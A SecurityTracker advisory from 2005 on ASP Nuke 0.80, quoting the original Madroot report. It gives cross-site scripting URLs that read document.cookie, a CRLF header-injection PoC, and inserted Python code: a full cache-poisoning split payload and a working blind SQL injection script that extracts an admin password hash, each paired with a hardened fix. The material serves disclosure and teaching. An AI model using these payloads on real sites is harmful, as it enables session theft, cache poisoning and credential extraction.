SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:   Application (Forum/Board/Portal)  >   ASP Nuke Vendors:   aspnuke.com
ASP Nuke Input Validation Holes Permit SQL Injection, HTTP Response Splitting, and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014310
SecurityTracker URL:  http://securitytracker.com/id/1014310
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 27 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.80 and prior versions
Description:   Several vulnerabilities were reported in ASP Nuke. A remote user can conduct SQL injection, cross-site scripting, and HTTP response splitting attacks.

The 'forgot_password.asp' script does not properly validate user-supplied input in the 'email' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Nuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'register.asp' script is also affected in several parameters, as shown in the following demonstration exploit URLs:

http://[target]/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'language_select.asp' script does not properly validate user-supplied input in the 'LangCode' parameter. A remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit URL is provided:

http://[target]/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue
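The %0d%0a in that URL is a CRLF; because the value is concatenated into the Location header of the 302 that Response.Redirect emits (see the code and captured headers in the source advisory below), the server ends the Location line early and the rest of the value becomes a header of its own. The Python below is an added example, not ASP Nuke's or IIS's code: it serialises a 302 the way the vulnerable page effectively does, reads the result back with a small browser-like parser, and then hardens the builder. It also goes one step beyond the advisory's PoC with a constructed payload that terminates the first response and supplies a complete second one, which is the form an attacker needs for cache poisoning. Header names and the helper functions are my own.

```python
"""HTTP response splitting via a redirect built from an unvalidated parameter,
modelled on language_select.asp (added example; the 302 layout imitates the
one captured in the advisory, it is not ASP Nuke's or IIS's code)."""
from urllib.parse import quote, unquote

CRLF = "\r\n"


def build_redirect_unsafe(langcode):
    """The effect of  Response.Redirect "tran_list.asp?langcode=" & LangCode
    when LangCode reaches the header untouched."""
    return (
        "HTTP/1.1 302 Object moved" + CRLF
        + "Location: tran_list.asp?langcode=" + langcode + CRLF
        + "Content-Type: text/html" + CRLF
        + CRLF
        + "<head><title>Object moved</title></head>"
    )


def build_redirect_safe(langcode):
    """Hardened: refuse control characters, then percent-encode the value so
    nothing the client sends can introduce a header boundary."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in langcode):
        raise ValueError("control character in LangCode")
    return build_redirect_unsafe(quote(langcode, safe=""))


def serve(query_value, safe=False):
    """Simulate the server: URL-decode the LangCode query value, build the reply."""
    builder = build_redirect_safe if safe else build_redirect_unsafe
    return builder(unquote(query_value))


def parse_stream(raw):
    """Toy HTTP/1.x response reader with Content-Length framing, standing in for
    a browser or proxy. Returns [(status_line, {header: value}, body), ...] and
    stops at the first chunk that is not a status line, so the tail the server
    appends after an injected second response is simply left over."""
    responses, rest = [], raw
    while rest.startswith("HTTP/"):
        head, _, rest = rest.partition(CRLF + CRLF)
        status, *lines = head.split(CRLF)
        headers = {}
        for line in lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        if "content-length" in headers:
            n = int(headers["content-length"])
            body, rest = rest[:n], rest[n:]
        else:
            body, rest = rest, ""
        responses.append((status, headers, body))
    return responses


# The advisory's PoC: one injected header.
ADVISORY_POC = "trivero%0d%0aSet-Cookie%3Asome%3Dvalue"

# Constructed here, beyond the PoC: end the 302 with an empty body and supply a
# whole second response that a cache could store under tran_list.asp.
POISON_BODY = "<html>poisoned</html>"
SPLIT_POC = quote(
    "trivero" + CRLF + "Content-Length: 0" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: " + str(len(POISON_BODY)) + CRLF + CRLF
    + POISON_BODY,
    safe="",
)


def safe_rejects(query_value):
    """True if the hardened builder refuses the decoded value."""
    try:
        serve(query_value, safe=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for status, headers, body in parse_stream(serve(SPLIT_POC)):
        print(status, sorted(headers), repr(body))
```

Note that the hardened builder does two things on purpose: the explicit control-character check gives a clear error for hostile input, and the percent-encoding means that even a value the check somehow misses cannot contain a raw CR or LF by the time it reaches the header. Either alone is a thinner defence than both.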

The 'comment_post.asp' script does not properly validate user-supplied input in the 'TaskID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
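The query shown in the source advisory below is a duplicate-post check: Subject and Body are quoted and have their single quotes doubled, but TaskID is concatenated raw. The page only observes whether a matching row exists, so this is a boolean-blind injection, and the advisory's claim that its exploit recovers the admin's SHA256 password hash is consistent with that. The Python below is an added example showing how such a yes/no oracle is turned into byte-by-byte extraction, and the parameterised query that closes it; it is neither ASP Nuke's code nor the aspnuke.pl exploit. SQLite stands in for whatever database ASP Nuke used (the page does not say; on Microsoft SQL Server the probe would use SUBSTRING rather than substr), the tblUser table, its columns and all rows are constructed, and the admin hash is of a made-up password.

```python
"""Boolean-blind SQL injection through the unquoted numeric TaskID in the
comment_post.asp duplicate-post check (added example; sqlite3 stands in for the
real backend, tblUser/PasswordHash are an assumed schema, rows are constructed)."""
import hashlib
import sqlite3

HEX = "0123456789abcdef"
ADMIN_HASH = hashlib.sha256(b"constructed-admin-password").hexdigest()


def make_db():
    """In-memory database with the one table the page names and an assumed user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblTaskComment (TaskID INTEGER, Subject TEXT, Body TEXT)")
    db.execute("INSERT INTO tblTaskComment VALUES (7, 'hello', 'first comment')")
    db.execute("CREATE TABLE tblUser (Username TEXT, PasswordHash TEXT)")  # assumed
    db.execute("INSERT INTO tblUser VALUES ('admin', ?)", (ADMIN_HASH,))
    db.commit()
    return db


def is_duplicate_unsafe(db, task_id, subject, body):
    """Exactly the advisory's query shape: Subject/Body get the '' doubling,
    TaskID is concatenated raw. The caller only learns whether a row matched."""
    sql = ("SELECT TaskID FROM tblTaskComment WHERE TaskID = " + task_id
           + " AND Subject = '" + subject.replace("'", "''") + "' "
           + "AND Body LIKE '" + body.replace("'", "''") + "'")
    return db.execute(sql).fetchone() is not None


def is_duplicate_safe(db, task_id, subject, body):
    """Hardened: enforce the integer type the column has, then bind every value."""
    if not task_id.isdigit():
        raise ValueError("TaskID must be an integer")
    sql = ("SELECT TaskID FROM tblTaskComment WHERE TaskID = ? "
           "AND Subject = ? AND Body LIKE ?")
    return db.execute(sql, (int(task_id), subject, body)).fetchone() is not None


def oracle_payload(position, ch):
    """TaskID value that makes the WHERE clause true iff the admin hash has `ch`
    at `position` (1-based). The trailing '--' comments out the Subject/Body
    conditions, which the attacker has no need to satisfy."""
    return ("0 OR (SELECT substr(PasswordHash,%d,1) FROM tblUser "
            "WHERE Username='admin') = '%s' -- " % (position, ch))


def extract_admin_hash(db, length=64):
    """Recover the hex hash one digit at a time from the duplicate/not-duplicate
    signal alone: 64 positions, at most 16 probes each."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            if is_duplicate_unsafe(db, oracle_payload(pos, ch), "x", "x"):
                recovered += ch
                break
        else:
            raise RuntimeError("no digit matched at position %d" % pos)
    return recovered


def safe_rejects_task_id(db, task_id):
    """True if the hardened check refuses the value before it reaches SQL."""
    try:
        is_duplicate_safe(db, task_id, "x", "x")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("recovered:", extract_admin_hash(db))
    print("matches  :", extract_admin_hash(db) == ADMIN_HASH)
```

The important detail for the fix is that the application treats TaskID as a number, so the check is a type check rather than an escaping rule: anything that is not an integer is refused, and the integer that remains is bound as a parameter, which leaves no string for an attacker to break out of.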

The vendor has been notified.

Alberto Trivero reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Nuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aspnuke.com/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke


M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80

Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/



Software Description

***********


"ASP Nuke is an open-source software application for running a
community-based web site on a web server. By open-source, we mean the code
is freely available for others to read, modify and use in accordance with
the software license. ASP Nuke is an extensible framework that allows you to
upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site
operators to re-organize the layout and navigation for their site."



Cross-Site Scripting (XSS)

***********


Let's look at code from /module/account/register/forgot_password.asp at line
33 and 103:

    <?
    ...
    sEmail = steForm("Email")
    ...
    <TR>
 <TD class="forml">
 <% steTxt "E-Mail" %> (req)<BR>
 <INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22"
MAXLENGTH="80" class="form">
 </TD>
    </TR>
    <TR>
    ...
    ?>

As we can see there isn't any control on the 'email' parameter when the
board gets its value.
Since the value of the parameter is put in the HTML page as is, an attacker
can do an XSS attack with a URL like this:


http://www.example.com/module/account/register/forgot_password.asp?email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Along the same lines, there are other parameters that aren't properly sanitised.
These are some PoC URLs:


http://www.example.com/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E



HTTP Response Splitting

***********


Let's look at code from /module/support/language/language_select.asp at line
31:

    <?
    ...
    If steForm("action") = "go" Then
        ' make sure the required fields are present
        If Trim(steForm("LangCode")) = "" Then
            sErrorMsg = steGetText("Please select a language from the list below")
        Else
            ' redirect to the language administration
            Response.Redirect "tran_list.asp?langcode=" & steEncForm("LangCode")
        End If
    End If
    ...
    ?>

When the redirect that this piece of code performs happens, it's possible to do
a CRLF injection attack, since there is no sanitisation at all. This is a PoC
URL:


http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

These are examples of HTTP headers:

    Request:
        POST /module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue HTTP/1.0
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
        Host: www.aspnuke.com
        Content-Length: 90
        Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
        Connection: Close

    Response:
        HTTP/1.1 302 Object moved
        Server: Microsoft-IIS/5.0
        Date: Sun, 15 May 2005 11:31:37 GMT
        Pragma: no-cache
        Location: tran_list.asp?langcode=trivero
        Set-Cookie: some=value
        Connection: Keep-Alive
        Content-Length: 121
        Content-Type: text/html
        Expires: Sun, 15 May 2005 11:30:38 GMT
        Cache-control: no-cache



SQL Injection

***********


Let's look at code from /module/support/task/comment_post.asp at line 36 and
75:

    <?
    ...
    nTaskID = steNForm("TaskID")
    ...
    If sErrorMsg = "" Then
        ' prevent dup posting here
        sStat = "SELECT TaskID " &_
            "FROM tblTaskComment " &_
            "WHERE TaskID = " & nTaskID & " " &_
            "AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
            "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
    ...
    ?>

As we can see there isn't any control on the 'TaskID' parameter when the
board gets its value. Since the value of the parameter is put in the SQL
query without sanitisation, an attacker can do an SQL injection attack. I've
made an exploit for this vulnerability that is able to recover the admin's
username and the SHA256 hash of his password, available at this address:
http://albythebest.altervista.org/aspnuke.pl



Solution

***********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@jumpy.it
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group

Copyright 2018, SecurityGlobal.net LLC